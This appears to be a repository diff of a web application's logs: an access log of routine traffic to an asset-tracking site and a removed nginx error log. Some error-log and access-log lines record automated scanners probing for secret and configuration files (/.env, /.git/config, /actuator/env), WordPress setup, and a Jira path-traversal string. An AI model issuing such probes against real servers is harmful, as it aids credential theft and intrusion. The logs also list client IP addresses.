[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:03:50:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:03:50:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:03:51:26 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3629] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[18/Feb/2026:06:36:00 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:06:36:00 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:06:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:06:36:00 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:06:36:00 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:06:38:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 11840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:14:17:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:14:17:37 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:14:17:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:14:19:08 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 8670] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 923] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:14:34:25 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:14:38:00 +0000] - 200 200 - POST https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:14:38:03 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 19904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:18:38:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 54.82.229.81] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.0.0 Safari/537.36" "-"
[18/Feb/2026:18:59:08 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 54.82.229.81] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-"
[18/Feb/2026:18:59:13 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 54.82.229.81] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-"
[18/Feb/2026:20:10:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-"
[18/Feb/2026:20:10:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:10:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:10:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:10:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:10:39 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:11:17 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 3630] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[18/Feb/2026:20:35:50 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:35:50 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:35:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:35:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:20:38:11 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 13153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:21:38:40 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/wp-admin/setup-config.php" [Client 208.84.101.66] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "-"
[18/Feb/2026:21:38:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-admin/setup-config.php" [Client 208.84.101.66] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "-"
[18/Feb/2026:22:04:18 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 3.147.78.250] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" "-"

View File

@@ -1,79 +0,0 @@
2026/02/14 22:59:23 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 22:59:23 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
2026/02/14 22:59:49 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 22:59:49 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
2026/02/14 23:00:28 [error] 341#341: *181 connect() failed (111: Connection refused) while connecting to upstream, client: 195.123.244.84, server: asset.hanmocnn.co.kr, request: "HEAD / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr", referrer: "http://asset.hanmocnn.co.kr"
2026/02/14 23:00:30 [warn] 340#340: *185 using uninitialized "server" variable while logging request, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "LEAKIX"
2026/02/14 23:00:30 [error] 343#343: *187 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:31 [error] 342#342: *191 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /server HTTP/1.1", upstream: "https://222.117.41.51:8000/server", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:32 [error] 346#346: *196 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:32 [error] 346#346: *196 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/"
2026/02/14 23:00:32 [error] 344#344: *195 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /server-status HTTP/1.1", upstream: "https://222.117.41.51:8000/server-status", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:34 [error] 345#345: *204 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /about HTTP/1.1", upstream: "https://222.117.41.51:8000/about", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:35 [error] 347#347: *207 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /login.action HTTP/1.1", upstream: "https://222.117.41.51:8000/login.action", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:36 [error] 341#341: *211 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /v2/_catalog HTTP/1.1", upstream: "https://222.117.41.51:8000/v2/_catalog", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:36 [error] 341#341: *214 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.DS_Store HTTP/1.1", upstream: "https://222.117.41.51:8000/.DS_Store", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:37 [error] 341#341: *217 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.env HTTP/1.1", upstream: "https://222.117.41.51:8000/.env", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:39 [error] 341#341: *221 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", upstream: "https://222.117.41.51:8000/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:41 [error] 341#341: *224 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.git/config HTTP/1.1", upstream: "https://222.117.41.51:8000/.git/config", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:42 [error] 341#341: *226 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /graphql HTTP/1.1", upstream: "https://222.117.41.51:8000/graphql", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:43 [error] 341#341: *229 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /api HTTP/1.1", upstream: "https://222.117.41.51:8000/api", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:43 [error] 341#341: *231 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /api/graphql HTTP/1.1", upstream: "https://222.117.41.51:8000/api/graphql", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:43 [error] 341#341: *233 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /graphql/api HTTP/1.1", upstream: "https://222.117.41.51:8000/graphql/api", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:43 [error] 341#341: *235 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /api/gql HTTP/1.1", upstream: "https://222.117.41.51:8000/api/gql", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:44 [error] 341#341: *238 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", upstream: "https://222.117.41.51:8000/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:45 [error] 341#341: *244 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /config.json HTTP/1.1", upstream: "https://222.117.41.51:8000/config.json", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:47 [error] 341#341: *248 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /telescope/requests HTTP/1.1", upstream: "https://222.117.41.51:8000/telescope/requests", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:47 [error] 341#341: *251 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /info.php HTTP/1.1", upstream: "https://222.117.41.51:8000/info.php", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:48 [error] 341#341: *255 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.well-known/security.txt HTTP/1.1", upstream: "https://222.117.41.51:8000/.well-known/security.txt", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:48 [error] 341#341: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 34.72.176.129, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:49 [error] 340#340: *261 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /actuator/env HTTP/1.1", upstream: "https://222.117.41.51:8000/actuator/env", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:51 [error] 353#353: *272 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger-ui.html HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger-ui.html", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:52 [error] 355#355: *276 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger/index.html HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger/index.html", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:53 [error] 356#356: *280 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger/swagger-ui.html HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger/swagger-ui.html", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:54 [error] 354#354: *275 connect() failed (111: Connection refused) while connecting to upstream, client: 205.169.39.45, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:54 [error] 357#357: *286 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", upstream: "https://222.117.41.51:8000/webjars/swagger-ui/index.html", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:55 [error] 358#358: *290 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger.json", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:56 [error] 359#359: *294 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger/v1/swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger/v1/swagger.json", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:57 [error] 360#360: *298 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /v2/api-docs HTTP/1.1", upstream: "https://222.117.41.51:8000/v2/api-docs", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:58 [error] 353#353: *302 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /v3/api-docs HTTP/1.1", upstream: "https://222.117.41.51:8000/v3/api-docs", host: "asset.hanmocnn.co.kr"
2026/02/14 23:00:59 [error] 353#353: *305 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /api-docs/swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/api-docs/swagger.json", host: "asset.hanmocnn.co.kr"
2026/02/14 23:01:00 [error] 353#353: *308 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /api/swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/api/swagger.json", host: "asset.hanmocnn.co.kr"
2026/02/14 23:01:01 [error] 353#353: *311 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /@vite/env HTTP/1.1", upstream: "https://222.117.41.51:8000/@vite/env", host: "asset.hanmocnn.co.kr"
